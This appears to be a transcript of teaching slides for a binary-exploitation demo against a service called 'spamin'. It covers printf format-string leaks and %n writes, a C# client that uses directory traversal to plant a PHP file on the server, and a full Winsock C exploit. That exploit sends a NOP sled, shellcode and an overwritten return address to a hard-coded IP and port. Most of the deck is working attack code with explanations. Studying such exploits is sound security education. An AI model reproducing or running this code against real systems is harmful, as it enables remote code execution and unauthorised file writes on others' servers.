SPAMIN binary hacking. Tools: IDA + Hex-Rays, hex editor, WinSCP, PuTTY, telnet, Visual Studio, Wireshark...
TRANSCRIPT
SPAMIN
Binary Hacking
Tools
• IDA + Hex-Rays • hex editor • WinSCP • PuTTY • telnet • Visual Studio • Wireshark (optional)
Do not pirate
• http://www.hex-rays.com/idapro/hallofshame.html
Begin Demo
• SSH in and browse the service • netstat -anp (plain ASCII hyphen; the en dash on the original slide does not paste into a shell) • telnet to the listening port • observe the protocol • attempt an exploit (optional) • reverse engineer • exploit more • patch
printf format string attack
int printf(const char *format, ...); /* variadic: the format string decides how many arguments are consumed */
/* Safe usage: the format is a string literal, so every conversion has a matching argument
 * and user data (str1) is only ever consumed by a %s. */
printf(“%s”, str1);printf(“%s, %x, %x, %x”, str1, x, y, z);
3
“%x %x %x”
1
2
printf(“%x %x %x”,1,2,3); /* each %x consumes one variadic argument — on 32-bit x86 cdecl, the next word above the format pointer on the stack */
/* Vulnerable: str1 is attacker-controlled and passed AS the format string. With no real arguments,
 * %x leaks successive stack words (addresses, saved registers), %s dereferences them, and %n writes
 * to them. gets() also has no bound and will overflow str1. Fix: fgets(str1, sizeof str1, stdin)
 * and printf("%s", str1) (or fputs(str1, stdout)). */
gets(str1);printf(str1);
%n: the number of characters written so far is stored into the integer pointed to by the corresponding int * (or variant) argument; nothing is converted or printed. This is the specifier that turns an attacker-controlled format string from an information leak into a memory write: printf takes the pointer from wherever the next argument would be, so with no real arguments it reads it from the caller's stack, which the attacker can pre-seed through the same input string.
C#
// Minimal client for the spamin protocol: three newline-terminated lines on one TCP connection.
// NOTE(review): target host/port are hard-coded and neither the TcpClient nor the StreamWriter is
// disposed in this excerpt (wrap both in `using` in real code).
TcpClient client = new TcpClient("128.198.60.73", 8008);
StreamWriter streamWriter = new StreamWriter(client.GetStream());
// Line 1: the service password. Line 2: the file name — a relative path containing "../", which
// the service apparently accepts unchecked (directory traversal into the web root).
streamWriter.Write("SPAM-IN-SPAM-OUT\n");streamWriter.Write("../public_html/fun.php\n");
// Line 3: contents written to that path (here a PHP probe page). Flush, or the buffered writer
// never actually sends anything before the process exits.
streamWriter.Write("<?php phpinfo(); ?>\n");streamWriter.Flush();
format
file contents
filename
512
512
512
0x200
0x200
0x200
0x62C
0xbffff178
…
0xbfffffff
stuff
Shellcode for a gets()-read buffer (presumably it must contain no 0x00 or 0x0a bytes, since either would end the line early)
• http://www.linux-secure.com/endymion/shellcodes/archive/linux-x86-mkdir1.c
NOP
Shell Code
RA
buffer
#include <winsock.h>
int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* server address */
WSADATA wsaData; /* Structure for WinSock setup communication */
/* Minimal Winsock client: connect to the spamin service and send the password line.
 * This is an excerpt of a larger function; `pass` is declared outside it (the fuller
 * attack client later in the deck shows it as "SPAM-IN-SPAM-OUT\n"). */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}
/* NOTE(review): socket(), connect() and send() return values are never checked. On Winsock
 * compare against INVALID_SOCKET / SOCKET_ERROR and report WSAGetLastError(); otherwise a
 * refused connection is indistinguishable from a server that silently accepted the data. */
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73"); /* hard-coded target; inet_addr() returns INADDR_NONE for a malformed string */
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));
/* 17 == strlen("SPAM-IN-SPAM-OUT\n"); prefer strlen(pass) so the length cannot drift from the string. */
send(sock,pass,17,0);
C# != C
unsigned __int8 isStringLess; // cf@1 unsigned __int8 isStringEqual; // zf@1 signed int v4; // ecx@1 int spamString2; // edi@1 char *userInput1; // esi@1 int result; // eax@6 char v8; // [sp-10h] [bp-648h]@1 char v9; // [sp+0h] [bp-638h]@1 char *v10; // [sp+Ch] [bp-62Ch]@16 int v11; // [sp+10h] [bp-628h]@1 int spamString1; // [sp+14h] [bp-624h]@1 char *v13; // [sp+18h] [bp-620h]@1 __int16 v14; // [sp+1Ch] [bp-61Ch]@1 char format; // [sp+28h] [bp-610h]@1 char filedata; // [sp+228h] [bp-410h]@12 char filename; // [sp+428h] [bp-210h]@9 int v18; // [sp+628h] [bp-10h]@1 FILE *stream; // [sp+62Ch] [bp-Ch]@1
format
file contents
filename
Other Local Function Variable
Other Local Function Variable
512
512
512
0x200
0x200
0x200
0x62C
Save Register (Prologue) ebp
RA
3
Save Register (Prologue) ebp
Save Registers
0xbffffb10
744
…
0xbfffffff
printf parameters
RAprocess message
main
nopshellcode
RA (repeated)
printf
“%x %x %x”
1
2
printf(“%x %x %x”,1,2,3);
• C# attack • fork -- attach a remote gdbserver • gdb ./spamin PID • x /1000w 0xbfffffff – walk the stack using the offset leaked by the %x output (gdb's x reads upward from its start address, so in practice start at the leaked address rather than at 0xbfffffff, the last stack byte)
attack
• gdbserver demo
int sock; /* Socket descriptor */
struct sockaddr_in mySockAddr; /* spamin server address (the "Echo server" wording came from a socket-tutorial template) */
char *pass = "SPAM-IN-SPAM-OUT\n"; /* service password line: 17 bytes including the trailing newline */
char payload [2500]; /* NOP sled + shellcode + repeated return address; only `length` bytes of it are sent */
WSADATA wsaData; /* Structure for WinSock setup communication */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
fprintf(stderr, "WSAStartup() failed");
exit(1);
}
/* NOTE(review): socket(), connect() and the three send() calls are unchecked. Compare against
 * INVALID_SOCKET / SOCKET_ERROR and check the byte count send() returns; otherwise a refused
 * connection or a short write looks exactly like a failed exploit. */
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73"); /* hard-coded target */
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));
int nopLength = 300; /* sled size: any return address landing on these 0x90 bytes slides into the shellcode */
/* Bytes actually sent as the second line. Assuming that line is read into `filename`
 * (bp-0x210 in the Hex-Rays dump, i.e. 528 bytes below the saved ebp), 700 bytes is enough
 * to run over the buffer, the saved ebp and the return address; re-derive it if the frame
 * layout of the target binary differs. */
int length = 700;
memset(payload, '\x90', nopLength); // Create the nop sled in the payload
memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload (sc is defined outside this excerpt)
for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload
{
/* The -1 makes the first RA byte overwrite the last byte of sc — its NUL terminator if sc is
 * a string literal — so no 0x00 ends the line early. The bytes are 0xbffffb20 little-endian:
 * just above the 0xbffffb10 in the slide's stack diagram, inside the sled, and none of them is
 * 0x00 or 0x0a. This only works while that stack address is stable (no ASLR). The writes stay
 * inside payload[2500] as long as sizeof(sc) <= 701. */
int r = nopLength + sizeof(sc) -1;
memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4);
}
payload[length-1] = '\n'; /* terminate the line; everything past index length-1 (most of the RA copies) is never sent */
send(sock,pass,17,0); /* line 1: password (17 == strlen(pass)) */
send(sock, payload, length, 0); /* line 2: the overflowing "filename" */
send(sock,pass,17,0); /* line 3: presumably the file-contents line; any text keeps the protocol moving */